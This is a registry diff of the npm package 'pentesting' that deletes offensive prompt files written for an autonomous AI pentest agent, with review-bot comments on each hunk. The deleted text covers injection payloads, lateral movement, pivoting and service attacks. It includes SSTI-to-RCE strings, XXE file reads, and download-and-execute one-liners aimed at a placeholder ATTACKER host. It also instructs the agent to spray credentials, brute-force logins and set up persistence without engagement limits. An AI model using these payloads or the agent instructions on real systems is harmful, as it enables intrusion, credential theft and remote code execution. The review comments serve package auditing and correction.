pentesting 0.73.14 → 0.90.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +119 -49
- package/bin/pentesting.mjs +32 -0
- package/lib/runtime.mjs +419 -0
- package/package.json +17 -46
- package/scripts/postinstall.mjs +30 -0
- package/scripts/preflight-local.sh +24 -0
- package/dist/ad/prompt.md +0 -60
- package/dist/agent-tool-MMDCBQ74.js +0 -989
- package/dist/api/prompt.md +0 -63
- package/dist/chunk-4KLVUP3C.js +0 -11458
- package/dist/chunk-AEQNELCQ.js +0 -5930
- package/dist/chunk-YZNPWDNS.js +0 -1166
- package/dist/cloud/prompt.md +0 -49
- package/dist/container/prompt.md +0 -58
- package/dist/database/prompt.md +0 -58
- package/dist/email/prompt.md +0 -44
- package/dist/file-sharing/prompt.md +0 -56
- package/dist/ics/prompt.md +0 -76
- package/dist/main.d.ts +0 -1
- package/dist/main.js +0 -9737
- package/dist/network/prompt.md +0 -49
- package/dist/persistence-IGAKJZJ3.js +0 -13
- package/dist/process-registry-DNEZX4S5.js +0 -30
- package/dist/prompts/base.md +0 -436
- package/dist/prompts/ctf-crypto.md +0 -168
- package/dist/prompts/ctf-forensics.md +0 -182
- package/dist/prompts/ctf-pwn.md +0 -137
- package/dist/prompts/evasion.md +0 -215
- package/dist/prompts/exploit.md +0 -416
- package/dist/prompts/infra.md +0 -114
- package/dist/prompts/llm/analyst-system.md +0 -76
- package/dist/prompts/llm/context-extractor-system.md +0 -19
- package/dist/prompts/llm/input-processor-system.md +0 -64
- package/dist/prompts/llm/memory-synth-system.md +0 -14
- package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
- package/dist/prompts/llm/reflector-system.md +0 -16
- package/dist/prompts/llm/report-generator-system.md +0 -21
- package/dist/prompts/llm/strategist-fallback.md +0 -9
- package/dist/prompts/llm/triage-system.md +0 -47
- package/dist/prompts/main-agent.md +0 -193
- package/dist/prompts/offensive-playbook.md +0 -250
- package/dist/prompts/payload-craft.md +0 -181
- package/dist/prompts/post.md +0 -185
- package/dist/prompts/recon.md +0 -296
- package/dist/prompts/report.md +0 -98
- package/dist/prompts/strategist-system.md +0 -472
- package/dist/prompts/strategy.md +0 -163
- package/dist/prompts/techniques/README.md +0 -40
- package/dist/prompts/techniques/ad-attack.md +0 -261
- package/dist/prompts/techniques/auth-access.md +0 -256
- package/dist/prompts/techniques/container-escape.md +0 -103
- package/dist/prompts/techniques/crypto.md +0 -296
- package/dist/prompts/techniques/enterprise-pentest.md +0 -175
- package/dist/prompts/techniques/file-attacks.md +0 -144
- package/dist/prompts/techniques/forensics.md +0 -313
- package/dist/prompts/techniques/injection.md +0 -217
- package/dist/prompts/techniques/lateral.md +0 -128
- package/dist/prompts/techniques/network-svc.md +0 -229
- package/dist/prompts/techniques/pivoting.md +0 -205
- package/dist/prompts/techniques/privesc.md +0 -190
- package/dist/prompts/techniques/pwn.md +0 -595
- package/dist/prompts/techniques/reversing.md +0 -183
- package/dist/prompts/techniques/sandbox-escape.md +0 -73
- package/dist/prompts/techniques/shells.md +0 -194
- package/dist/prompts/vuln.md +0 -190
- package/dist/prompts/web.md +0 -318
- package/dist/prompts/zero-day.md +0 -298
- package/dist/remote-access/prompt.md +0 -52
- package/dist/web/prompt.md +0 -59
- package/dist/wireless/prompt.md +0 -62
|
@@ -1,217 +0,0 @@
|
|
|
1
|
-
# Injection Attacks — Comprehensive Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
|
|
4
|
-
> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
|
|
5
|
-
> to decide what to test and in what order. Adapt dynamically — not to this list.
|
|
6
|
-
|
|
7
|
-
> **Cross-ref**: web.md (web testing), evasion.md (bypass), payload-craft.md (mutation)
|
|
8
|
-
|
|
9
|
-
## Core Principle
|
|
10
|
-
Every input is a potential injection point. There are 20+ injection TYPES,
|
|
11
|
-
each with hundreds of variants. **You cannot memorize them all — SEARCH for each.**
|
|
12
|
-
|
|
13
|
-
## Injection Type Map (Know ALL Categories)
|
|
14
|
-
|
|
15
|
-
```
|
|
16
|
-
INJECTION TYPES — Complete Category Awareness:
|
|
17
|
-
│
|
|
18
|
-
├── 1. SQL Injection (SQLi)
|
|
19
|
-
│ ├── In-band: UNION-based, Error-based
|
|
20
|
-
│ ├── Blind: Boolean-based, Time-based
|
|
21
|
-
│ ├── Out-of-band: DNS/HTTP exfiltration
|
|
22
|
-
│ ├── Second-order: stored then triggered
|
|
23
|
-
│ ├── Stacked queries: multiple statements
|
|
24
|
-
│ └── DB-specific: MySQL, PostgreSQL, MSSQL, Oracle, SQLite (each has unique syntax)
|
|
25
|
-
│
|
|
26
|
-
├── 2. Command Injection (CMDi / OS Injection)
|
|
27
|
-
│ ├── Direct: ; | & && || ` $()
|
|
28
|
-
│ ├── Blind: timing-based (sleep/ping), out-of-band (DNS/HTTP callback)
|
|
29
|
-
│ ├── Argument injection: --option=malicious
|
|
30
|
-
│ └── Environment variable injection
|
|
31
|
-
│
|
|
32
|
-
├── 3. Server-Side Template Injection (SSTI)
|
|
33
|
-
│ ├── Jinja2 (Python): {{7*7}}, {{config}}, {{''.__class__.__mro__[2].__subclasses__()}}
|
|
34
|
-
│ ├── Twig (PHP): {{7*7}}, {{_self.env.registerUndefinedFilterCallback("exec")}}
|
|
35
|
-
│ ├── Freemarker (Java): ${7*7}, <#assign ex="freemarker.template.utility.Execute"?new()>
|
|
36
|
-
│ ├── ERB (Ruby): <%=7*7%>, <%=system('id')%>
|
|
37
|
-
│ ├── Pug/Jade (Node): #{7*7}
|
|
38
|
-
│ ├── Velocity (Java): #set($x=7*7)$x
|
|
39
|
-
│ └── DETECTION: Send polyglot → {{7*7}}${7*7}<%=7*7%>${{7*7}} → see what evaluates
|
|
40
|
-
│
|
|
41
|
-
├── 4. Cross-Site Scripting (XSS)
|
|
42
|
-
│ ├── Reflected, Stored, DOM-based, Blind
|
|
43
|
-
│ ├── Context: HTML body, attribute, JavaScript, URL, CSS, SVG, MathML
|
|
44
|
-
│ ├── Payloads: <script>, <img onerror>, <svg onload>, event handlers, javascript: URI
|
|
45
|
-
│ └── Impact: session theft, keylogging, phishing, crypto mining, worm
|
|
46
|
-
│
|
|
47
|
-
├── 5. XML External Entity (XXE)
|
|
48
|
-
│ ├── Classic: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
|
|
49
|
-
│ ├── Blind: out-of-band via DTD + HTTP/DNS callback
|
|
50
|
-
│ ├── Error-based: trigger error containing file content
|
|
51
|
-
│ ├── Through: SOAP, SVG upload, DOCX/XLSX, RSS feeds, SAML
|
|
52
|
-
│ └── Variants: XInclude, XSLT injection
|
|
53
|
-
│
|
|
54
|
-
├── 6. LDAP Injection
|
|
55
|
-
│ ├── Authentication bypass: *)(&
|
|
56
|
-
│ ├── Data extraction: )(cn=*)
|
|
57
|
-
│ └── Blind: timing/error differences
|
|
58
|
-
│
|
|
59
|
-
├── 7. NoSQL Injection
|
|
60
|
-
│ ├── MongoDB: {"$gt":""}, {"$ne":""}, {"$regex":".*"}
|
|
61
|
-
│ ├── Authentication bypass: {"username":{"$ne":""},"password":{"$ne":""}}
|
|
62
|
-
│ └── Operator injection: $where, $regex, $gt, $ne
|
|
63
|
-
│
|
|
64
|
-
├── 8. XPath Injection
|
|
65
|
-
│ ├── Similar to SQLi but for XML: ' or '1'='1
|
|
66
|
-
│ └── Blind: boolean/timing based
|
|
67
|
-
│
|
|
68
|
-
├── 9. CRLF Injection
|
|
69
|
-
│ ├── Header injection: %0d%0a
|
|
70
|
-
│ ├── Can lead to: HTTP response splitting, XSS, cache poisoning
|
|
71
|
-
│ └── Log injection: inject fake log entries
|
|
72
|
-
│
|
|
73
|
-
├── 10. Header Injection
|
|
74
|
-
│ ├── Host header: password reset poisoning, routing bypass
|
|
75
|
-
│ ├── X-Forwarded-For: IP-based access control bypass
|
|
76
|
-
│ ├── X-Original-URL / X-Rewrite-URL: path-based access control bypass
|
|
77
|
-
│ └── Referer: SSRF via referer processing
|
|
78
|
-
│
|
|
79
|
-
├── 11. SSTI → RCE Chains (template-specific)
|
|
80
|
-
│ └── web_search("{template_engine} SSTI to RCE payload")
|
|
81
|
-
│
|
|
82
|
-
├── 12. Expression Language Injection (EL Injection)
|
|
83
|
-
│ ├── Java EE: ${7*7}, #{7*7}
|
|
84
|
-
│ └── Spring: *{7*7}
|
|
85
|
-
│
|
|
86
|
-
├── 13. Code Injection
|
|
87
|
-
│ ├── PHP: eval(), assert(), preg_replace with /e
|
|
88
|
-
│ ├── Python: eval(), exec(), input() (Python 2)
|
|
89
|
-
│ ├── Ruby: eval(), system()
|
|
90
|
-
│ └── Node: eval(), Function()
|
|
91
|
-
│
|
|
92
|
-
├── 14. CSV Injection (Formula Injection)
|
|
93
|
-
│ ├── =cmd|'/C calc'!A0 (Excel)
|
|
94
|
-
│ └── Through exported CSV/XLSX files
|
|
95
|
-
│
|
|
96
|
-
├── 15. Email Header Injection
|
|
97
|
-
│ ├── %0aCc: attacker@evil.com
|
|
98
|
-
│ └── Add arbitrary recipients, modify headers
|
|
99
|
-
│
|
|
100
|
-
├── 16. HTTP Parameter Pollution (HPP)
|
|
101
|
-
│ ├── ?param=good¶m=evil (server picks which?)
|
|
102
|
-
│ └── Bypass WAF by splitting payload across same-name params
|
|
103
|
-
│
|
|
104
|
-
├── 17. Prototype Pollution (JavaScript)
|
|
105
|
-
│ ├── __proto__[isAdmin]=true
|
|
106
|
-
│ ├── constructor.prototype.isAdmin=true
|
|
107
|
-
│ └── Can lead to: RCE, auth bypass, DoS
|
|
108
|
-
│
|
|
109
|
-
├── 18. Insecure Deserialization
|
|
110
|
-
│ ├── Java: ObjectInputStream → gadget chains (ysoserial)
|
|
111
|
-
│ ├── PHP: unserialize() → POP chains (phpggc)
|
|
112
|
-
│ ├── Python: pickle.loads() → __reduce__ → RCE
|
|
113
|
-
│ ├── .NET: BinaryFormatter, JSON.NET TypeNameHandling
|
|
114
|
-
│ ├── Ruby: Marshal.load()
|
|
115
|
-
│ └── Node: node-serialize
|
|
116
|
-
│
|
|
117
|
-
├── 19. GraphQL Injection
|
|
118
|
-
│ ├── Introspection: {__schema{types{name,fields{name}}}}
|
|
119
|
-
│ ├── Batching for brute force bypass
|
|
120
|
-
│ ├── Nested queries for DoS
|
|
121
|
-
│ └── Mutation discovery → unauthorized operations
|
|
122
|
-
│
|
|
123
|
-
└── 20. WebSocket Injection
|
|
124
|
-
├── Same injection types apply through WebSocket messages
|
|
125
|
-
└── Often LESS filtered than HTTP requests
|
|
126
|
-
```
|
|
127
|
-
|
|
128
|
-
## 🧠 Injection Discovery — Autonomous Decision Tree
|
|
129
|
-
|
|
130
|
-
```
|
|
131
|
-
FOR EVERY input point discovered:
|
|
132
|
-
|
|
133
|
-
1. IDENTIFY context: Where does this input go?
|
|
134
|
-
├── Database query → SQLi/NoSQLi
|
|
135
|
-
├── System command → CMDi
|
|
136
|
-
├── Template render → SSTI
|
|
137
|
-
├── XML parser → XXE
|
|
138
|
-
├── File path → LFI/RFI (see file-attacks.md)
|
|
139
|
-
├── HTTP header → Header injection / CRLF
|
|
140
|
-
├── LDAP query → LDAPi
|
|
141
|
-
├── HTML output → XSS
|
|
142
|
-
├── Deserialization → Insecure deserialization
|
|
143
|
-
└── Unknown → try ALL categories with detection probes
|
|
144
|
-
|
|
145
|
-
2. DETECTION PROBES (send these to identify vulnerability type):
|
|
146
|
-
├── ' " ; — → SQL errors?
|
|
147
|
-
├── {{7*7}} ${7*7} → Template evaluation?
|
|
148
|
-
├── ;id ;whoami |id → Command output?
|
|
149
|
-
├── <script>alert(1)</script> → XSS rendering?
|
|
150
|
-
├── <!--#exec cmd="id"--> → SSI?
|
|
151
|
-
├── %0d%0aHeader:injected → CRLF?
|
|
152
|
-
└── ANY behavioral difference (error, timing, output) = signal
|
|
153
|
-
|
|
154
|
-
3. CONFIRM → find the exact injection type and context
|
|
155
|
-
4. EXPLOIT → web_search("{injection_type} exploitation payloads hacktricks")
|
|
156
|
-
5. BLOCKED? → payload_mutate + evasion.md → try encoded variants
|
|
157
|
-
6. CHAIN → injection → RCE → shell → privesc (see shells.md, privesc.md)
|
|
158
|
-
```
|
|
159
|
-
|
|
160
|
-
## Injection Search Patterns
|
|
161
|
-
|
|
162
|
-
```
|
|
163
|
-
For EVERY injection type discovered:
|
|
164
|
-
|
|
165
|
-
web_search("{injection_type} exploit payloads hacktricks")
|
|
166
|
-
web_search("{injection_type} {database/language} cheatsheet")
|
|
167
|
-
web_search("{injection_type} bypass WAF filter")
|
|
168
|
-
web_search("{injection_type} blind extraction techniques")
|
|
169
|
-
web_search("{injection_type} to RCE")
|
|
170
|
-
web_search("PayloadsAllTheThings {injection_type}")
|
|
171
|
-
|
|
172
|
-
Automated tools (where applicable):
|
|
173
|
-
├── SQLi: sqlmap -u URL --forms --batch --level=5 --risk=3
|
|
174
|
-
├── XSS: dalfox url URL
|
|
175
|
-
├── SSTI: tplmap -u URL
|
|
176
|
-
├── CMDi: commix --url=URL
|
|
177
|
-
├── XXE: xxeinjector
|
|
178
|
-
└── General: nuclei -u URL -as
|
|
179
|
-
```
|
|
180
|
-
|
|
181
|
-
## Injection → RCE Chains
|
|
182
|
-
```
|
|
183
|
-
Goal: Every injection should eventually lead to RCE if possible.
|
|
184
|
-
|
|
185
|
-
SQLi → RCE:
|
|
186
|
-
├── MySQL: INTO OUTFILE webshell, UDF, sys_exec
|
|
187
|
-
├── PostgreSQL: COPY TO file, lo_export, pg_read_file
|
|
188
|
-
├── MSSQL: xp_cmdshell, sp_OACreate
|
|
189
|
-
├── Oracle: DBMS_SCHEDULER, Java stored procedures
|
|
190
|
-
└── SQLite: load_extension()
|
|
191
|
-
|
|
192
|
-
SSTI → RCE:
|
|
193
|
-
├── Jinja2: {{config.__class__.__init__.__globals__['os'].popen('id').read()}}
|
|
194
|
-
├── Twig: {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
|
|
195
|
-
├── Each engine has different paths → SEARCH for specific engine
|
|
196
|
-
└── web_search("{engine} SSTI RCE payload")
|
|
197
|
-
|
|
198
|
-
XXE → impact:
|
|
199
|
-
├── File read → credentials → further access
|
|
200
|
-
├── SSRF → internal service access
|
|
201
|
-
├── RCE (rare): expect:// wrapper (PHP), xslt:// extensions
|
|
202
|
-
└── Blind → out-of-band data exfiltration
|
|
203
|
-
|
|
204
|
-
XSS → impact:
|
|
205
|
-
├── Session theft → admin access
|
|
206
|
-
├── Blind XSS → admin panel compromise
|
|
207
|
-
├── DOM manipulation → credential theft
|
|
208
|
-
├── Worm → self-spreading XSS
|
|
209
|
-
└── Keylogging → capture all input
|
|
210
|
-
|
|
211
|
-
Deserialization → RCE:
|
|
212
|
-
├── Java: ysoserial → choose correct gadget chain for target libraries
|
|
213
|
-
├── PHP: phpggc → choose correct POP chain
|
|
214
|
-
├── Python: pickle → __reduce__ method
|
|
215
|
-
├── .NET: ysoserial.net
|
|
216
|
-
└── ALWAYS: web_search("{framework} deserialization gadget chain RCE")
|
|
217
|
-
```
|
|
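Review bot: the entire 217-line file goes away in this hunk (the file list pairs it with `package/dist/prompts/techniques/injection.md +0 -217`) and nothing else in the diff adds it back; since `dist/main.js` (-9737) and the rest of `dist/` are dropped in the same release while `scripts/postinstall.mjs` (+30) and `lib/runtime.mjs` (+419) are new, the 0.90.2 tarball no longer carries the prompts or the agent code it runs, so the README change should state where they now come from and, if they are fetched at install or run time, the fetch should be version-pinned and integrity-checked so a reviewer of the published package can still tell what it executes. If the text is being relocated rather than retired, fix three lines before it lands elsewhere: line 33 `{{''.__class__.__mro__[2].__subclasses__()}}` raises IndexError on Python 3, where `str.__mro__` is `(str, object)` and the `object` entry is `[1]`; line 84 files `*{7*7}` under Spring, but `*{...}` is Thymeleaf's selection-expression syntax (Spring EL is the `${...}`/`#{...}` form on line 83); and line 173 `sqlmap -u URL --forms --batch --level=5 --risk=3` turns on the OR-based boolean tests that sqlmap's own documentation warns can update every row of a table when the injectable statement is an UPDATE, which is not a sane default for an agent that runs unattended.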
@@ -1,128 +0,0 @@
|
|
|
1
|
-
# Lateral Movement & Pivoting — Comprehensive Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **Cross-ref**: shells.md (shell access), ad-attack.md (AD movement), privesc.md (escalation)
|
|
4
|
-
|
|
5
|
-
## Core Principle
|
|
6
|
-
Initial access is one machine. Lateral movement = entire network.
|
|
7
|
-
Every credential, hash, token, and key is a potential pivot point.
|
|
8
|
-
|
|
9
|
-
## Lateral Movement Techniques
|
|
10
|
-
|
|
11
|
-
```
|
|
12
|
-
LATERAL MOVEMENT MAP:
|
|
13
|
-
│
|
|
14
|
-
├── 1. Credential-Based Movement
|
|
15
|
-
│ ├── SSH with credentials: ssh user@TARGET
|
|
16
|
-
│ ├── SSH with key: ssh -i stolen_id_rsa user@TARGET
|
|
17
|
-
│ ├── RDP: xfreerdp /v:TARGET /u:user /p:pass /cert:ignore
|
|
18
|
-
│ ├── WinRM: evil-winrm -i TARGET -u user -p pass
|
|
19
|
-
│ ├── PsExec: impacket-psexec user:pass@TARGET
|
|
20
|
-
│ ├── WMI: impacket-wmiexec user:pass@TARGET
|
|
21
|
-
│ ├── SMBExec: impacket-smbexec user:pass@TARGET
|
|
22
|
-
│ ├── DCOM: impacket-dcomexec user:pass@TARGET
|
|
23
|
-
│ ├── Pass-the-Hash: impacket-psexec -hashes :NTLM_HASH user@TARGET
|
|
24
|
-
│ ├── Pass-the-Ticket: export KRB5CCNAME=ticket.ccache → impacket tools -k
|
|
25
|
-
│ └── Credential spraying: try EVERY found credential on EVERY accessible service
|
|
26
|
-
│
|
|
27
|
-
├── 2. Network Pivoting (Access Hidden Networks)
|
|
28
|
-
│ ├── SSH tunneling:
|
|
29
|
-
│ │ ├── Local: ssh -L LOCAL_PORT:INTERNAL_HOST:INTERNAL_PORT user@PIVOT
|
|
30
|
-
│ │ ├── Dynamic SOCKS: ssh -D 9050 user@PIVOT → proxychains
|
|
31
|
-
│ │ ├── Remote: ssh -R ATTACKER_PORT:INTERNAL_HOST:PORT user@ATTACKER
|
|
32
|
-
│ │ └── ProxyJump: ssh -J user@PIVOT user@INTERNAL
|
|
33
|
-
│ │
|
|
34
|
-
│ ├── Chisel (recommended for non-SSH):
|
|
35
|
-
│ │ ├── Server (attacker): chisel server -p 8080 --reverse
|
|
36
|
-
│ │ ├── Client (pivot): chisel client ATTACKER:8080 R:socks
|
|
37
|
-
│ │ └── Then: proxychains nmap -Pn INTERNAL_SUBNET
|
|
38
|
-
│ │
|
|
39
|
-
│ ├── Ligolo-ng (easiest for complex pivoting):
|
|
40
|
-
│ │ ├── Proxy (attacker): ligolo-proxy -selfcert -laddr 0.0.0.0:PORT
|
|
41
|
-
│ │ ├── Agent (pivot): ligolo-agent -connect ATTACKER:PORT -ignore-cert
|
|
42
|
-
│ │ └── Add routes to internal networks from attacker
|
|
43
|
-
│ │
|
|
44
|
-
│ ├── socat:
|
|
45
|
-
│ │ ├── Port forwarding: socat TCP-LISTEN:LOCAL,fork TCP:INTERNAL:PORT
|
|
46
|
-
│ │ └── Useful on systems without SSH
|
|
47
|
-
│ │
|
|
48
|
-
│ ├── sshuttle: sshuttle -r user@PIVOT INTERNAL_SUBNET/24
|
|
49
|
-
│ │ └── Transparent proxy — no need for proxychains
|
|
50
|
-
│ │
|
|
51
|
-
│ ├── Metasploit: route add SUBNET MASK SESSION
|
|
52
|
-
│ │ └── autoroute + socks_proxy modules
|
|
53
|
-
│ │
|
|
54
|
-
│ ├── Windows-specific:
|
|
55
|
-
│ │ ├── netsh portproxy: netsh interface portproxy add v4tov4 listenport=P connectaddress=HOST connectport=P
|
|
56
|
-
│ │ ├── plink.exe: plink -ssh -L LOCAL:INTERNAL:PORT user@PIVOT
|
|
57
|
-
│ │ └── web_search("windows port forwarding pivoting techniques")
|
|
58
|
-
│ │
|
|
59
|
-
│ └── web_search("pivoting tunneling techniques {tool} hacktricks")
|
|
60
|
-
│
|
|
61
|
-
├── 3. File Transfer (Getting Tools Where They Need to Go)
|
|
62
|
-
│ ├── Linux upload to target:
|
|
63
|
-
│ │ ├── wget/curl: wget http://ATTACKER:PORT/file -O /tmp/file
|
|
64
|
-
│ │ ├── Python HTTP server: python3 -m http.server PORT (on attacker)
|
|
65
|
-
│ │ ├── scp: scp file user@TARGET:/tmp/
|
|
66
|
-
│ │ ├── Netcat: nc -lvnp PORT > file (recv) | nc TARGET PORT < file (send)
|
|
67
|
-
│ │ ├── Base64: base64 file → echo 'B64' | base64 -d > file
|
|
68
|
-
│ │ └── /dev/tcp: cat < /dev/tcp/ATTACKER/PORT > file
|
|
69
|
-
│ │
|
|
70
|
-
│ ├── Windows upload to target:
|
|
71
|
-
│ │ ├── certutil: certutil -urlcache -split -f http://ATTACKER/file file
|
|
72
|
-
│ │ ├── PowerShell: IWR -Uri http://ATTACKER/file -OutFile file
|
|
73
|
-
│ │ ├── bitsadmin: bitsadmin /transfer job /download /priority high URL file
|
|
74
|
-
│ │ ├── SMB: copy \\ATTACKER\share\file . (start smbserver on attacker)
|
|
75
|
-
│ │ └── In-memory: IEX(New-Object Net.WebClient).DownloadString('http://ATK/ps1')
|
|
76
|
-
│ │
|
|
77
|
-
│ └── web_search("file transfer techniques {OS} hacktricks")
|
|
78
|
-
│
|
|
79
|
-
├── 4. Internal Network Discovery
|
|
80
|
-
│ ├── From compromised host:
|
|
81
|
-
│ │ ├── ip a, ifconfig, ipconfig /all → network interfaces
|
|
82
|
-
│ │ ├── ip route, route -n, route print → routing tables
|
|
83
|
-
│ │ ├── arp -a → known hosts in local network
|
|
84
|
-
│ │ ├── cat /etc/hosts, type C:\Windows\System32\drivers\etc\hosts
|
|
85
|
-
│ │ ├── netstat -antp → active connections → more targets
|
|
86
|
-
│ │ ├── Internal port scan: for i in $(seq 1 254); do ping -c1 -W1 10.0.0.$i; done
|
|
87
|
-
│ │ └── proxychains nmap -sT -Pn -p- INTERNAL_SUBNET (through pivot)
|
|
88
|
-
│ │
|
|
89
|
-
│ └── EVERY new network found = FULL reconnaissance cycle (rerun everything)
|
|
90
|
-
│
|
|
91
|
-
├── 5. Credential Reuse Strategy
|
|
92
|
-
│ ├── Every found credential → test on ALL reachable services:
|
|
93
|
-
│ │ ├── SSH, RDP, WinRM, SMB, FTP, databases, web logins, VPN
|
|
94
|
-
│ │ ├── crackmapexec smb SUBNET/24 -u user -p pass → mass test
|
|
95
|
-
│ │ ├── Same password with different usernames
|
|
96
|
-
│ │ ├── Same username with slight password variations
|
|
97
|
-
│ │ └── Hash-based: Pass-the-Hash to all Windows targets
|
|
98
|
-
│ │
|
|
99
|
-
│ └── Credential chain: creds from host A → access host B → creds from B → access C
|
|
100
|
-
│
|
|
101
|
-
└── 6. Covert Channels
|
|
102
|
-
├── DNS tunneling: iodine, dnscat2 → bypass network restrictions
|
|
103
|
-
├── ICMP tunneling: icmpsh, ptunnel
|
|
104
|
-
├── HTTP tunneling: through web proxies
|
|
105
|
-
├── WebSocket tunneling: through WAF
|
|
106
|
-
└── web_search("covert channel exfiltration tunneling {protocol}")
|
|
107
|
-
```
|
|
108
|
-
|
|
109
|
-
## Pivoting Workflow
|
|
110
|
-
```
|
|
111
|
-
Got access to new host?
|
|
112
|
-
1. STABILIZE: upgrade shell, set up persistence (shells.md)
|
|
113
|
-
2. ENUMERATE: network interfaces, routes, ARP, connections, hosts file
|
|
114
|
-
3. LOOT: credentials, keys, tokens, hashes, config files
|
|
115
|
-
4. PIVOT: set up tunnel/proxy to newly discovered networks
|
|
116
|
-
5. SCAN: recon the new network through the pivot
|
|
117
|
-
6. SPRAY: test found credentials on all new services
|
|
118
|
-
7. REPEAT: for each new host compromised
|
|
119
|
-
```
|
|
120
|
-
|
|
121
|
-
## Search Patterns
|
|
122
|
-
```
|
|
123
|
-
web_search("pivoting techniques {tool_name} hacktricks")
|
|
124
|
-
web_search("file transfer {OS} one-liner techniques")
|
|
125
|
-
web_search("{protocol} tunneling tool pivot")
|
|
126
|
-
web_search("proxychains {tool} through pivot")
|
|
127
|
-
web_search("lateral movement {technique} detection evasion")
|
|
128
|
-
```
|
|
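Review bot: line 86 `Internal port scan: for i in $(seq 1 254); do ping -c1 -W1 10.0.0.$i; done` is a ping sweep, not a port scan, and it finds nothing on hosts that drop ICMP; relabel it as host discovery and pair it with a connect check that reuses the bash `/dev/tcp` device already used on line 68, for example `(echo >/dev/tcp/10.0.0.$i/445) 2>/dev/null && echo 10.0.0.$i`, which needs no tooling on the pivot. Two more points in the same hunk: line 112 `1. STABILIZE: upgrade shell, set up persistence (shells.md)` makes persistence an unconditional first step of the pivoting workflow, which for an autonomous agent should be gated on the engagement's rules rather than assumed; and the bitsadmin form on line 73 requires an absolute path for the local file name, so a bare `file` as written is rejected. As with the other prompt deletions in this release, the hunk removes the 128-line `lateral.md` without a replacement anywhere in the diff, and the README should say where this content now lives.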
@@ -1,229 +0,0 @@
|
|
|
1
|
-
# Network Service Attacks — Comprehensive Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
|
|
4
|
-
> Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
|
|
5
|
-
> to decide what to test and in what order. Adapt dynamically — not to this list.
|
|
6
|
-
|
|
7
|
-
> **Cross-ref**: recon.md (discovery), exploit.md (exploitation), shells.md (getting shell)
|
|
8
|
-
|
|
9
|
-
## Core Principle
|
|
10
|
-
Every open port is an attack surface. Every service has known and unknown vulnerabilities.
|
|
11
|
-
**ALWAYS: service detection → version → IMMEDIATE web_search for exploits.**
|
|
12
|
-
|
|
13
|
-
## Service Attack Decision Engine
|
|
14
|
-
|
|
15
|
-
```
|
|
16
|
-
FOR EVERY OPEN PORT DISCOVERED:
|
|
17
|
-
│
|
|
18
|
-
├── 1. IDENTIFY: nmap -Pn -sV -sC -p PORT TARGET → exact version
|
|
19
|
-
├── 2. SEARCH: web_search("{service} {version} exploit CVE hacktricks")
|
|
20
|
-
├── 3. CHECK: searchsploit {service} {version}
|
|
21
|
-
├── 4. READ: browse_url(hacktricks_result) → learn attack methodology
|
|
22
|
-
├── 5. ATTACK: apply known techniques + search for bypasses
|
|
23
|
-
├── 6. BLOCKED: evasion.md + payload_mutate → try encoded/alternative
|
|
24
|
-
└── 7. CHAIN: combine with other findings (see strategy.md)
|
|
25
|
-
```
|
|
26
|
-
|
|
27
|
-
## 🌐 Web Services (80, 443, 8080, 8443)
|
|
28
|
-
|
|
29
|
-
```
|
|
30
|
-
Web Server Identified → FULL WEB PIPELINE:
|
|
31
|
-
├── Technology: whatweb, wappalyzer, curl headers
|
|
32
|
-
├── CMS detection → CMS-specific scanner:
|
|
33
|
-
│ WordPress → wpscan --enumerate vp,vt,u --plugins-detection aggressive
|
|
34
|
-
│ Drupal → droopescan scan drupal -u URL
|
|
35
|
-
│ Joomla → joomscan -u URL
|
|
36
|
-
│ web_search("{CMS} {version} exploit CVE")
|
|
37
|
-
│
|
|
38
|
-
├── Content discovery (MANDATORY):
|
|
39
|
-
│ ├── ffuf -u URL/FUZZ -w /usr/share/wordlists/dirb/big.txt -fc 404
|
|
40
|
-
│ ├── feroxbuster -u URL --smart --auto-tune
|
|
41
|
-
│ ├── gobuster dir -u URL -w wordlist -x php,asp,aspx,jsp,html,js,txt,bak
|
|
42
|
-
│ ├── Try backup extensions: .bak, .old, .orig, .save, .swp, ~, .tmp
|
|
43
|
-
│ └── Add technology-specific extensions to wordlist
|
|
44
|
-
│
|
|
45
|
-
├── Sensitive file check:
|
|
46
|
-
│ .env, .git/HEAD, .DS_Store, .htaccess, web.config,
|
|
47
|
-
│ robots.txt, sitemap.xml, crossdomain.xml, clientaccesspolicy.xml,
|
|
48
|
-
│ phpinfo.php, server-status, server-info, info.php, test.php
|
|
49
|
-
│
|
|
50
|
-
├── API discovery:
|
|
51
|
-
│ /api, /api/v1, /swagger, /swagger-ui, /openapi.json,
|
|
52
|
-
│ /graphql, /graphiql, /api-docs, /.well-known/
|
|
53
|
-
│
|
|
54
|
-
├── Virtual hosts: ffuf -H "Host: FUZZ.TARGET" -u http://IP -w subdomains.txt
|
|
55
|
-
│
|
|
56
|
-
└── Deep web testing → see injection.md, auth-access.md, file-attacks.md
|
|
57
|
-
```
|
|
58
|
-
|
|
59
|
-
## 🔐 Authentication Services
|
|
60
|
-
|
|
61
|
-
```
|
|
62
|
-
SSH (22):
|
|
63
|
-
├── Version CVE: web_search("OpenSSH {version} CVE exploit")
|
|
64
|
-
├── Username enumeration: web_search("openssh {version} user enumeration CVE")
|
|
65
|
-
├── Brute force: hydra -l root -P wordlist ssh://TARGET
|
|
66
|
-
├── Key-based: try found keys from other hosts
|
|
67
|
-
├── Agent forwarding: if forwarded → hijack to access other hosts
|
|
68
|
-
└── Misconfig: check for weak algorithms, passwordless login
|
|
69
|
-
|
|
70
|
-
FTP (21):
|
|
71
|
-
├── Anonymous: ftp TARGET → anonymous / (empty password)
|
|
72
|
-
├── Version CVE: web_search("{ftpd} {version} exploit")
|
|
73
|
-
├── Brute force: hydra -l admin -P wordlist ftp://TARGET
|
|
74
|
-
├── Writable dirs: if serves web → upload web shell
|
|
75
|
-
├── Bounce attack: use FTP to scan internal ports
|
|
76
|
-
└── PASV mode: reveals internal IP addresses
|
|
77
|
-
|
|
78
|
-
Telnet (23):
|
|
79
|
-
├── Often unencrypted → capture credentials
|
|
80
|
-
├── Default creds: web_search("{device} telnet default credentials")
|
|
81
